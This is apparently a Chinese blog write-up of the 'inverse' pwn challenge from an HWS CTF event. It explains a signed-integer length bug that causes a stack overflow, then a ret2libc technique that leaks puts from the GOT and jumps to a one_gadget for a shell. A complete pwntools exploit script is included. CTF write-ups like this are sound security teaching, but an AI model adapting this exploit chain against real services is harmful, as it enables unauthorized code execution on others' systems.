• HWS-CTF-第七期山大站-inverse



    第一次真正意义上独立在比赛中做出题目来了,距离真正意义接触CTF-PWN差不多正好两个月。但由于不知道靶场要自己开而且端口每次自己打开会改,交flag稍微晚了些(我太菜了)

    inverse

    main

    在这里插入图片描述

    work

    在这里插入图片描述
    这里很明显发现符号转换的bug,即nbytes对应有符号数为-1时可以造成溢出

    read_int

    将输入的字符转换为int类型(字符为负数也会转换)
    在这里插入图片描述

    read_n

    往字符数组输入字符
    在这里插入图片描述

    思路

    onegadget

    在这里插入图片描述
    ROPgadget

    在这里插入图片描述
    在这里插入图片描述

    首先patchelf换库
    然后通过输入字符-1使得绕过检查,随后-1对应0xffffffff(32位),再次read时造成溢出,构造payload,先将返回地址覆盖为puts函数的地址,然后下一个为work函数的地址(puts的返回地址),然后是puts的参数,为puts的got表的地址,然后第一次work造成puts地址泄露,(先通过one_gadget找到可用的gadget,最后选择0x6749f的,因为esi一般都是符合其要求的,然后eax比较好找对应的gadget,如上图)从而得到libc基地址,然后第二次work时同样输入字符-1,随后将返回地址覆盖为pop eax;ret的gadget的地址,然后是0,最后是onegadget的地址,最后成功getshell

    exp

    from pwn import*
    #context(os="linux",arch="i386",log_level="debug")
    s=remote("124.71.135.126",30043)
    #s=process("./pwn")
    f=ELF("./pwn")
    libc=ELF("./libc-2.27.so")
    #gdb.attach(s,"b main")
    s.recvuntil(b"input world tag: ")
    s.sendline(b"1")
    s.sendline(b"-1")
    s.recvuntil(b"leave me a msg:")
    payload=b"a"*64+p32(f.sym["puts"])+p32(f.sym["work"])+p32(f.got["puts"])
    #+f.got["puts"]
    s.sendline(payload)
    put_addr=u32(s.recvline()[0:4])
    libc_base=put_addr-libc.sym["puts"]
    
    system_addr=libc_base+0x6749f 
    payload=b"a"*64+p32(0x00024d37+libc_base)+p32(0)+p32(system_addr)
    s.sendline(b"-1")
    s.recvuntil(b"leave me a msg:")
    
    s.sendline(payload)
    # print(hex(u32(put_addr)))
    s.interactive()
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18
    • 19
    • 20
    • 21
    • 22
    • 23
    • 24
    • 25
  • 相关阅读:
    面试整理(不断更新)
    内网穿透 | 推荐两个免费的内网穿透工具
    4.求1000以内的所有完数
    多线程-浅析线程安全
    性能专题|实战角度分析JVM 源码
    MySQL 事务隔离级别,读现象,MVCC
    小团队管理的艺术:实现1+1>2的协同效能
    web渗透测试----5、暴力破解漏洞--(3)FTP密码破解
    Mac连接U盘后怎么读取 Mac连接U盘后怎么取消只读模式
    【白话机器学习系列】白话梯度下降
  • 原文地址:https://blog.csdn.net/llovewuzhengzi/article/details/134496650